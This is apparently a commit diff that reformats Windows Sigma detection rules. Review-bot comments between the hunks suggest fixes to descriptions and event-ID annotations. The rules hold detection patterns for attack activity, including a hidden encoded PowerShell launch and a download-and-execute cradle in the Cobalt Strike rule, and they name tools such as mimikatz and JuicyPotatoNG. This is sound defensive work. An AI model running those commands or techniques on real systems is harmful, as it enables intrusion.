(CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations references: - https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv author: Nasreddine Bencherchali (Nextron Systems) 
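Review bot: Only `12` gets the new `# MDE: ExploitGuardNonMicrosoftSignedBlocked` comment, while `11` on the line above is, per the Exploit Protection event table for Microsoft-Windows-Security-Mitigations, the audit-mode counterpart ("Code integrity guard audit"): the load was reported but allowed. The title and description both say "Blocked", so an 11 hit would be mis-triaged as a prevented sideload unless the list says otherwise; I would annotate both: `- 11 # CIG audit mode: unsigned DLL load was only reported, not blocked` and `- 12 # CIG block mode: unsigned DLL load was denied (MDE: ExploitGuardNonMicrosoftSignedBlocked)`. Please verify the 11/12 semantics against the provider manifest referenced by the sibling rule before relying on the wording.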
diff --git a/sigma/builtin/shell_core/win_shell_core_susp_packages_installed.yml b/sigma/builtin/shell_core/win_shell_core_susp_packages_installed.yml index 2a3af6aab..6a710760f 100644 --- a/sigma/builtin/shell_core/win_shell_core_susp_packages_installed.yml +++ b/sigma/builtin/shell_core/win_shell_core_susp_packages_installed.yml @@ -1,8 +1,7 @@ title: Suspicious Application Installed id: 83c161b6-ca67-4f33-8ad0-644a0737cf07 status: test -description: Detects suspicious application installed by looking at the added shortcut - to the app resolver cache +description: Detects suspicious application installed by looking at the added shortcut to the app resolver cache references: - https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3 author: Nasreddine Bencherchali (Nextron Systems) @@ -18,6 +17,7 @@ detection: selection_name: EventID: 28115 Name|contains: + # Please add more - Zenmap - AnyDesk - wireshark @@ -25,8 +25,9 @@ detection: selection_packageid: EventID: 28115 AppID|contains: + # Please add more - zenmap.exe - - prokzult ad + - prokzult ad # AnyDesk - wireshark - openvpn condition: shell_core and (1 of selection_*) diff --git a/sigma/builtin/smbclient/security/win_smbclient_security_susp_failed_guest_logon.yml b/sigma/builtin/smbclient/security/win_smbclient_security_susp_failed_guest_logon.yml index 4551cccbf..82966e0cd 100644 --- a/sigma/builtin/smbclient/security/win_smbclient_security_susp_failed_guest_logon.yml +++ b/sigma/builtin/smbclient/security/win_smbclient_security_susp_failed_guest_logon.yml 
@@ -1,8 +1,7 @@ title: Suspicious Rejected SMB Guest Logon From IP id: 71886b70-d7b4-4dbf-acce-87d2ca135262 status: test -description: Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in - Windows Spooler Service +description: Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service references: - https://twitter.com/KevTheHermit/status/1410203844064301056 - https://github.com/hhlxf/PrintNightmare diff --git a/sigma/builtin/system/lsasrv/win_system_lsasrv_ntlmv1.yml b/sigma/builtin/system/lsasrv/win_system_lsasrv_ntlmv1.yml index b8238d0f0..13b09e9cc 100644 --- a/sigma/builtin/system/lsasrv/win_system_lsasrv_ntlmv1.yml +++ b/sigma/builtin/system/lsasrv/win_system_lsasrv_ntlmv1.yml @@ -1,9 +1,7 @@ title: NTLMv1 Logon Between Client and Server id: e9d4ab66-a532-4ef7-a502-66a9e4a34f5d status: experimental -description: Detects the reporting of NTLMv1 being used between a client and server. - NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced - by modern hardware. +description: Detects the reporting of NTLMv1 being used between a client and server. NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced by modern hardware. references: - https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/22H2/W10_22H2_Pro_20230321_19045.2728/WEPExplorer/LsaSrv.xml author: Tim Shelton, Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config.yml b/sigma/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config.yml index 8d40844b5..6cbdbbf3c 100644 --- a/sigma/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config.yml +++ b/sigma/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config.yml 
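Review bot: The reflowed `+description:` line still reads "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", which contradicts the title "Suspicious Rejected SMB Guest Logon From IP" and the `smbclient/security` log source; it looks copied from a PrintNightmare rule and tells the analyst nothing about what actually fires. Since the commit rewrites exactly this line, it is the place to fix it, e.g. `description: Detects an SMB guest logon from a remote IP that the SMB client rejected. Observed during PrintNightmare (CVE-2021-1675) exploitation attempts against the spooler (see references), but any unauthenticated SMB access attempt can produce it.` The detection block itself is outside this hunk, so the exact event ID should be confirmed before the wording is finalised.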
@@ -1,8 +1,7 @@ title: DHCP Server Loaded the CallOut DLL id: 13fc89a9-971e-4ca6-b9dc-aa53a445bf40 status: test -description: This rule detects a DHCP server in which a specified Callout DLL (in - registry) was loaded +description: This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded references: - https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx diff --git a/sigma/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config_failed.yml b/sigma/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config_failed.yml index 6406984b6..097406372 100644 --- a/sigma/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config_failed.yml +++ b/sigma/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config_failed.yml @@ -1,8 +1,7 @@ title: DHCP Server Error Failed Loading the CallOut DLL id: 75edd3fd-7146-48e5-9848-3013d7f0282c status: test -description: This rule detects a DHCP server error in which a specified Callout DLL - (in registry) could not be loaded +description: This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded references: - https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx diff --git a/sigma/builtin/system/microsoft_windows_directory_services_sam/win_system_exploit_cve_2021_42287.yml b/sigma/builtin/system/microsoft_windows_directory_services_sam/win_system_exploit_cve_2021_42287.yml index 12187b99c..ea053bd98 100644 --- a/sigma/builtin/system/microsoft_windows_directory_services_sam/win_system_exploit_cve_2021_42287.yml +++ b/sigma/builtin/system/microsoft_windows_directory_services_sam/win_system_exploit_cve_2021_42287.yml 
@@ -1,18 +1,13 @@ title: Potential CVE-2021-42287 Exploitation Attempt id: e80a0fee-1a62-4419-b31e-0d0db6e6013a related: - - id: 44bbff3e-4ca3-452d-a49a-6efa4cafa06f - type: similar + - id: 44bbff3e-4ca3-452d-a49a-6efa4cafa06f + type: similar status: test -description: 'The attacker creates a computer object using those permissions with - a password known to her. - +description: | + The attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. - - Because she created the object (CREATOR OWNER), she gets granted additional permissions - and can do many changes to the object. - - ' + Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object. references: - https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/ author: frack113 @@ -28,10 +23,10 @@ detection: system: Channel: System selection: - Provider_Name: Microsoft-Windows-Directory-Services-SAM + Provider_Name: Microsoft-Windows-Directory-Services-SAM # Active Directory EventID: - - 16990 - - 16991 + - 16990 # Object class and UserAccountControl validation failure + - 16991 # SAM Account Name validation failure condition: system and selection falsepositives: - Unknown diff --git a/sigma/builtin/system/microsoft_windows_distributed_com/win_system_lpe_indicators_tabtip.yml b/sigma/builtin/system/microsoft_windows_distributed_com/win_system_lpe_indicators_tabtip.yml index 497202f25..d4d1655df 100644 --- a/sigma/builtin/system/microsoft_windows_distributed_com/win_system_lpe_indicators_tabtip.yml +++ b/sigma/builtin/system/microsoft_windows_distributed_com/win_system_lpe_indicators_tabtip.yml 
@@ -1,8 +1,7 @@ title: Local Privilege Escalation Indicator TabTip id: bc2e25ed-b92b-4daa-b074-b502bdd1982b status: experimental -description: Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG - is used on a system in brute force mode +description: Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode references: - https://github.com/antonioCoco/JuicyPotatoNG author: Florian Roth (Nextron Systems) @@ -20,9 +19,9 @@ detection: selection: Provider_Name: Microsoft-Windows-DistributedCOM EventID: 10001 - param1: C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe - param2: 2147943140 - param3: '{054AAE20-4BEA-4347-8A35-64A533254A9D}' + param1: C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe # Binary starting/started + param2: 2147943140 # ERROR id + param3: '{054AAE20-4BEA-4347-8A35-64A533254A9D}' # DCOM Server condition: system and selection falsepositives: - Unknown diff --git a/sigma/builtin/system/microsoft_windows_eventlog/win_system_eventlog_cleared.yml b/sigma/builtin/system/microsoft_windows_eventlog/win_system_eventlog_cleared.yml index 081afcad6..864fb77a0 100644 --- a/sigma/builtin/system/microsoft_windows_eventlog/win_system_eventlog_cleared.yml +++ b/sigma/builtin/system/microsoft_windows_eventlog/win_system_eventlog_cleared.yml 
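Review bot: The new `# ERROR id` comment on `param2: 2147943140` is too vague to be useful: that decimal is 0x800702E4, i.e. HRESULT_FROM_WIN32(740) = ERROR_ELEVATION_REQUIRED, which is presumably what DCOM 10001 reports when the activation attempt fails for lack of elevation and is the actual JuicyPotatoNG signal. I would write the decoded value so nobody has to redo the arithmetic: `param2: 2147943140 # 0x800702E4 = HRESULT_FROM_WIN32(ERROR_ELEVATION_REQUIRED)`. The `# DCOM Server` comment on `param3` would likewise be more helpful if it named the COM class behind the CLSID rather than restating the field's role.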
@@ -1,15 +1,14 @@ title: Eventlog Cleared id: a62b37e0-45d3-48d9-a517-90c1a1b0186b related: - - id: f2f01843-e7b8-4f95-a35a-d23584476423 - type: obsoletes - - id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982 - type: derived - - id: 100ef69e-3327-481c-8e5c-6d80d9507556 - type: derived + - id: f2f01843-e7b8-4f95-a35a-d23584476423 + type: obsoletes + - id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982 + type: derived + - id: 100ef69e-3327-481c-8e5c-6d80d9507556 + type: derived status: experimental -description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil - cl" command execution +description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution references: - https://twitter.com/deviouspolack/status/832535435960209408 - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 @@ -30,6 +29,7 @@ detection: EventID: 104 Provider_Name: Microsoft-Windows-Eventlog filter_main_covered: + # The channels below are already covered by the rule 100ef69e-3327-481c-8e5c-6d80d9507556 Channel: - Microsoft-Windows-PowerShell/Operational - Microsoft-Windows-Sysmon/Operational @@ -39,8 +39,7 @@ detection: - Windows PowerShell condition: system and (selection and not 1 of filter_main_*) falsepositives: - - Rollout of log collection agents (the setup routine often includes a reset of - the local Eventlog) + - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) - System provisioning (system reset before the golden image creation) level: medium ruletype: Sigma diff --git a/sigma/builtin/system/microsoft_windows_eventlog/win_system_susp_eventlog_cleared.yml b/sigma/builtin/system/microsoft_windows_eventlog/win_system_susp_eventlog_cleared.yml index edb0bee55..8f8642ee1 100644 --- a/sigma/builtin/system/microsoft_windows_eventlog/win_system_susp_eventlog_cleared.yml 
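Review bot: The new comment in `filter_main_covered` explains why those channels are excluded, but the rule now relies on two `Channel` selections with different meanings: `system: Channel: System` is the event's own channel, while the filter's `Channel:` list must refer to the `Channel` data field of event 104 (the name of the log that was cleared). If the converter resolves both to the System-section channel, the filter never matches and every clear — including the core logs already handled by 100ef69e — would also fire here at `medium`. I would make the intent explicit next to the new comment, e.g. `Channel: # EventData.Channel of event 104 = cleared log name, not the System channel`, and confirm the field mapping distinguishes the two.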
+++ b/sigma/builtin/system/microsoft_windows_eventlog/win_system_susp_eventlog_cleared.yml @@ -1,16 +1,14 @@ title: Important Windows Eventlog Cleared id: 100ef69e-3327-481c-8e5c-6d80d9507556 related: - - id: a62b37e0-45d3-48d9-a517-90c1a1b0186b - type: derived + - id: a62b37e0-45d3-48d9-a517-90c1a1b0186b + type: derived status: experimental -description: Detects the clearing of one of the Windows Core Eventlogs. e.g. caused - by "wevtutil cl" command execution +description: Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by "wevtutil cl" command execution references: - https://twitter.com/deviouspolack/status/832535435960209408 - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 -author: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron - Systems) +author: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems) date: 2022/05/17 modified: 2023/11/15 tags: @@ -35,8 +33,7 @@ detection: - Windows PowerShell condition: system and selection falsepositives: - - Rollout of log collection agents (the setup routine often includes a reset of - the local Eventlog) + - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) - System provisioning (system reset before the golden image creation) level: high ruletype: Sigma diff --git a/sigma/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_cert_use_no_strong_mapping.yml b/sigma/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_cert_use_no_strong_mapping.yml index 1a216a9f2..3ccf8b7de 100644 --- a/sigma/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_cert_use_no_strong_mapping.yml +++ b/sigma/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_cert_use_no_strong_mapping.yml 
@@ -1,18 +1,10 @@ title: Certificate Use With No Strong Mapping id: 993c2665-e6ef-40e3-a62a-e1a97686af79 status: experimental -description: 'Detects a user certificate that was valid but could not be mapped to - a user in a strong way (such as via explicit mapping, key trust mapping, or a - SID) - - This could be a sign of exploitation of the elevation of privilege vulnerabilities - (CVE-2022-34691, CVE-2022-26931, CVE-2022-26923) that can occur when the KDC allows - certificate spoofing by not requiring a strong mapping. - - Events where the AccountName and CN of the Subject do not match, or where the - CN ends in a dollar sign indicating a machine, may indicate certificate spoofing. - - ' +description: | + Detects a user certificate that was valid but could not be mapped to a user in a strong way (such as via explicit mapping, key trust mapping, or a SID) + This could be a sign of exploitation of the elevation of privilege vulnerabilities (CVE-2022-34691, CVE-2022-26931, CVE-2022-26923) that can occur when the KDC allows certificate spoofing by not requiring a strong mapping. + Events where the AccountName and CN of the Subject do not match, or where the CN ends in a dollar sign indicating a machine, may indicate certificate spoofing. references: - https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16 author: '@br4dy5' 
@@ -29,12 +21,10 @@ detection: Provider_Name: Kerberos-Key-Distribution-Center EventID: - 39 - - 41 + - 41 # For Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 condition: system and selection falsepositives: - - If prevalent in the environment, filter on events where the AccountName and - CN of the Subject do not reference the same user - - If prevalent in the environment, filter on CNs that end in a dollar sign indicating - it is a machine name + - If prevalent in the environment, filter on events where the AccountName and CN of the Subject do not reference the same user + - If prevalent in the environment, filter on CNs that end in a dollar sign indicating it is a machine name level: medium ruletype: Sigma diff --git a/sigma/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_rc4_downgrade.yml b/sigma/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_rc4_downgrade.yml index e8007e590..c088a448c 100644 --- a/sigma/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_rc4_downgrade.yml +++ b/sigma/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_rc4_downgrade.yml @@ -1,8 +1,7 @@ title: KDC RC4-HMAC Downgrade CVE-2022-37966 id: e6f81941-b1cd-4766-87db-9fc156f658ee status: test -description: Detects the exploitation of a security bypass and elevation of privilege - vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation +description: Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation references: - https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d author: Florian Roth (Nextron Systems) 
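Review bot: The two reflowed `falsepositives` entries contradict the description in the previous hunk: the description says events where AccountName and the Subject CN do not match "may indicate certificate spoofing", yet the first FP entry tells operators to filter on events where they "do not reference the same user", i.e. to suppress exactly the suspicious ones. I believe the FP guidance is inverted and should read `- If prevalent in the environment, filter on events where the AccountName and CN of the Subject reference the same user`. Separately, the comment on `41` only gives the OS version; as far as I recall from KB5014754, events 39/41 are logged only while the KDC is in Compatibility mode (the logon still succeeds), and in Full Enforcement the logon is refused without them, so a note such as `- 39 # logged in Compatibility mode only; in Full Enforcement the logon is denied instead - verify` would stop silence being mistaken for safety.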
@@ -18,7 +17,7 @@ detection: selection: EventID: 42 Provider_Name: Kerberos-Key-Distribution-Center - Level: 2 + Level: 2 # Error condition: system and selection falsepositives: - Unknown diff --git a/sigma/builtin/system/microsoft_windows_kernel_general/win_system_susp_sam_dump.yml b/sigma/builtin/system/microsoft_windows_kernel_general/win_system_susp_sam_dump.yml index b6daaa4e6..c04a533e4 100644 --- a/sigma/builtin/system/microsoft_windows_kernel_general/win_system_susp_sam_dump.yml +++ b/sigma/builtin/system/microsoft_windows_kernel_general/win_system_susp_sam_dump.yml @@ -1,8 +1,7 @@ title: SAM Dump to AppData id: 839dd1e8-eda8-4834-8145-01beeee33acd status: test -description: Detects suspicious SAM dump activity as cause by QuarksPwDump and other - password dumpers +description: Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers author: Florian Roth (Nextron Systems) date: 2018/01/27 modified: 2023/04/30 diff --git a/sigma/builtin/system/microsoft_windows_user_profiles_service/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml b/sigma/builtin/system/microsoft_windows_user_profiles_service/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml index 20481ca85..0fab3be41 100644 --- a/sigma/builtin/system/microsoft_windows_user_profiles_service/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml +++ b/sigma/builtin/system/microsoft_windows_user_profiles_service/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml 
@@ -1,10 +1,7 @@ title: Suspicious Usage of CVE_2021_34484 or CVE 2022_21919 id: 52a85084-6989-40c3-8f32-091e12e17692 status: experimental -description: During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User - Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with - this event) are created. Moreover, it appears the directory \Users\TEMP is created - may be created during the exploitation. Viewed on 2008 Server +description: During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \Users\TEMP is created may be created during the exploitation. Viewed on 2008 Server references: - https://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html author: Cybex diff --git a/sigma/builtin/system/microsoft_windows_windows_update_client/win_system_susp_system_update_error.yml b/sigma/builtin/system/microsoft_windows_windows_update_client/win_system_susp_system_update_error.yml index 6f946df64..ea7667a83 100644 --- a/sigma/builtin/system/microsoft_windows_windows_update_client/win_system_susp_system_update_error.yml +++ b/sigma/builtin/system/microsoft_windows_windows_update_client/win_system_susp_system_update_error.yml @@ -1,8 +1,7 @@ title: Windows Update Error id: 13cfeb75-9e33-4d04-b0f7-ab8faaa95a59 status: stable -description: Detects Windows update errors including installation failures and connection - issues. Defenders should observe this in case critical update KB aren't installed. +description: Detects Windows update errors including installation failures and connection issues. Defenders should observe this in case critical update KB aren't installed. author: frack113 date: 2021/12/04 modified: 2023/09/07 
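Review bot: The reflowed `+description:` line keeps the garbled phrase "the directory \Users\TEMP is created may be created" and the dangling "Viewed on 2008 Server"; since the commit rewrites this line, it should read cleanly, e.g. `... Moreover, the directory \Users\TEMP may be created during exploitation (observed on Windows Server 2008).` The "maybe lot of false positives with this event" aside about 1515 belongs in `falsepositives`, which is outside this hunk. The title (a context line) mixes `CVE_2021_34484` and `CVE 2022_21919`; the canonical `CVE-2021-34484` / `CVE-2022-21919` spelling would make the rule findable by CVE search.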
@@ -19,11 +18,11 @@ detection:
 selection:
 Provider_Name: Microsoft-Windows-WindowsUpdateClient
 EventID:
- - 16
- - 20
- - 24
- - 213
- - 217
+ - 16 # Unable to Connect: Windows is unable to connect to the automatic updates service and therefore cannot download and install updates according to the set schedule
+ - 20 # Installation Failure: Windows failed to install the following update with error
+ - 24 # Uninstallation Failure: Windows failed to uninstall the following update with error
+ - 213 # Revert Failure: Windows failed to revert the following update with error
+ - 217 # Commit Failure: Windows failed to commit the following update with error
 condition: system and selection
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/system/netlogon/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml b/sigma/builtin/system/netlogon/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml
index 4b9b1d436..fc623dd6b 100644
--- a/sigma/builtin/system/netlogon/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml
+++ b/sigma/builtin/system/netlogon/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml
@@ -1,9 +1,7 @@
 title: Zerologon Exploitation Using Well-known Tools
 id: 18f37338-b9bd-4117-a039-280c81f7a596
 status: stable
-description: This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472)
- vulnerability using mimikatz zerologon module or other exploits from machine with
- "kali" hostname.
+description: This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with "kali" hostname.
 references:
 - https://www.secura.com/blog/zero-logon
 - https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382
diff --git a/sigma/builtin/system/netlogon/win_system_vul_cve_2020_1472.yml b/sigma/builtin/system/netlogon/win_system_vul_cve_2020_1472.yml
index cd3ef2406..f1efb2408 100644
--- a/sigma/builtin/system/netlogon/win_system_vul_cve_2020_1472.yml
+++ b/sigma/builtin/system/netlogon/win_system_vul_cve_2020_1472.yml
@@ -1,8 +1,7 @@
 title: Vulnerable Netlogon Secure Channel Connection Allowed
 id: a0cb7110-edf0-47a4-9177-541a4083128a
 status: test
-description: Detects that a vulnerable Netlogon secure channel connection was allowed,
- which could be an indicator of CVE-2020-1472.
+description: Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.
 references:
 - https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc
 author: NVISO
@@ -18,7 +17,7 @@ detection:
 system:
 Channel: System
 selection:
- Provider_Name: NetLogon
+ Provider_Name: NetLogon # Active Directory: NetLogon ETW GUID {F33959B4-DBEC-11D2-895B-00C04F79AB69}
 EventID: 5829
 condition: system and selection
 falsepositives:
diff --git a/sigma/builtin/system/ntfs/win_system_ntfs_vuln_exploit.yml b/sigma/builtin/system/ntfs/win_system_ntfs_vuln_exploit.yml
index d270e9078..cd5a4de3c 100644
--- a/sigma/builtin/system/ntfs/win_system_ntfs_vuln_exploit.yml
+++ b/sigma/builtin/system/ntfs/win_system_ntfs_vuln_exploit.yml
@@ -1,8 +1,7 @@
 title: NTFS Vulnerability Exploitation
 id: f14719ce-d3ab-4e25-9ce6-2899092260b0
 status: test
-description: This the exploitation of a NTFS vulnerability as reported without many
- details via Twitter
+description: This the exploitation of a NTFS vulnerability as reported without many details via Twitter
 references:
 - https://twitter.com/jonasLyk/status/1347900440000811010
 - https://twitter.com/wdormann/status/1347958161609809921
diff --git a/sigma/builtin/system/service_control_manager/win_system_cobaltstrike_service_installs.yml b/sigma/builtin/system/service_control_manager/win_system_cobaltstrike_service_installs.yml
index 2ff5f936e..e7d3ccc22 100644
--- a/sigma/builtin/system/service_control_manager/win_system_cobaltstrike_service_installs.yml
+++ b/sigma/builtin/system/service_control_manager/win_system_cobaltstrike_service_installs.yml
@@ -1,8 +1,7 @@
 title: CobaltStrike Service Installations - System
 id: 5a105d34-05fc-401e-8553-272b45c1522d
 status: test
-description: Detects known malicious service installs that appear in cases in which
- a Cobalt Strike beacon elevates privileges or lateral movement
+description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement
 references:
 - https://www.sans.org/webcasts/119395
 - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/
@@ -38,9 +37,8 @@ detection:
 selection3:
 ImagePath|contains: powershell -nop -w hidden -encodedcommand
 selection4:
- ImagePath|base64offset|contains: 'IEX (New-Object Net.Webclient).DownloadString(''http://127.0.0.1:'
- condition: system and (selection_id and (selection1 or selection2 or selection3
- or selection4))
+ ImagePath|base64offset|contains: "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:"
+ condition: system and (selection_id and (selection1 or selection2 or selection3 or selection4))
 falsepositives:
 - Unknown
 level: critical
diff --git a/sigma/builtin/system/service_control_manager/win_system_defender_disabled.yml b/sigma/builtin/system/service_control_manager/win_system_defender_disabled.yml
index 82c11939b..510bdff18 100644
--- a/sigma/builtin/system/service_control_manager/win_system_defender_disabled.yml
+++ b/sigma/builtin/system/service_control_manager/win_system_defender_disabled.yml
@@ -1,14 +1,14 @@
 title: Windows Defender Threat Detection Disabled - Service
 id: 6c0a7755-6d31-44fa-80e1-133e57752680
 related:
- - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62
- type: derived
+ - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62
+ type: derived
 status: stable
 description: Detects the "Windows Defender Threat Protection" service has been disabled
 references:
 - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
-author: "J\xE1n Tren\u010Dansk\xFD, frack113"
+author: Ján Trenčanský, frack113
 date: 2020/07/28
 modified: 2023/08/08
 tags:
@@ -23,12 +23,13 @@ detection:
 selection:
 EventID: 7036
 Provider_Name: Service Control Manager
+ # Note: The service name and messages are localized
 param1:
 - Windows Defender Antivirus Service
- - Service antivirus Microsoft Defender
+ - Service antivirus Microsoft Defender # French OS
 param2:
 - stopped
- - "arr\xEAt\xE9"
+ - arrêté
 condition: system and selection
 falsepositives:
 - Administrator actions
diff --git a/sigma/builtin/system/service_control_manager/win_system_hack_smbexec.yml b/sigma/builtin/system/service_control_manager/win_system_hack_smbexec.yml
index 922d21095..502aba028 100644
--- a/sigma/builtin/system/service_control_manager/win_system_hack_smbexec.yml
+++ b/sigma/builtin/system/service_control_manager/win_system_hack_smbexec.yml
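Review bot: The `param2` entry is now the plain scalar `arrêté` instead of the escaped `"arr\xEAt\xE9"`, so whether the French stop message still matches depends on every consumer reading the rule file as UTF-8; the escaped form was independent of file encoding. If the loader is known to decode rules as UTF-8 this is harmless, but it is an implicit assumption the repository should pin (an encoding check in CI, or keeping non-ASCII match values escaped) rather than leave to each tool. The `author` line has the same change but is cosmetic. The new comment `# Note: The service name and messages are localized` would also be more useful as `# Note: The service name and messages are localized; only the English and French variants are listed here`, since the list under it is what defines coverage.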
@@ -5,7 +5,7 @@ description: Detects the use of smbexec.py tool by detecting a specific service
 references:
 - https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/
 - https://github.com/fortra/impacket/blob/33058eb2fde6976ea62e04bc7d6b629d64d44712/examples/smbexec.py#L286-L296
- - https://github.com/fortra/impacket/blob/edef71f17bc1240f9f8c957bbda98662951ac3ec/examples/smbexec.py#L60
+ - https://github.com/fortra/impacket/blob/edef71f17bc1240f9f8c957bbda98662951ac3ec/examples/smbexec.py#L60 # Old service name
 author: Omer Faruk Celik
 date: 2018/03/20
 modified: 2023/11/09
diff --git a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_clip_services.yml b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_clip_services.yml
index 1f05023e6..294dbc4fa 100644
--- a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_clip_services.yml
+++ b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_clip_services.yml
@@ -3,7 +3,7 @@ id: f7385ee2-0e0c-11eb-adc1-0242ac120002
 status: test
 description: Detects Obfuscated use of Clip.exe to execute PowerShell
 references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 26)
 author: Jonathan Cheong, oscd.community
 date: 2020/10/13
 modified: 2023/02/20
diff --git a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_obfuscated_iex_services.yml b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_obfuscated_iex_services.yml
index fa7fe4e0d..7bef91030 100644
--- a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_obfuscated_iex_services.yml
+++ b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_obfuscated_iex_services.yml
@@ -1,8 +1,7 @@
 title: Invoke-Obfuscation Obfuscated IEX Invocation - System
 id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9
 status: test
-description: Detects all variations of obfuscated powershell IEX invocation code generated
- by Invoke-Obfuscation framework from the code block linked in the references
+description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references
 references:
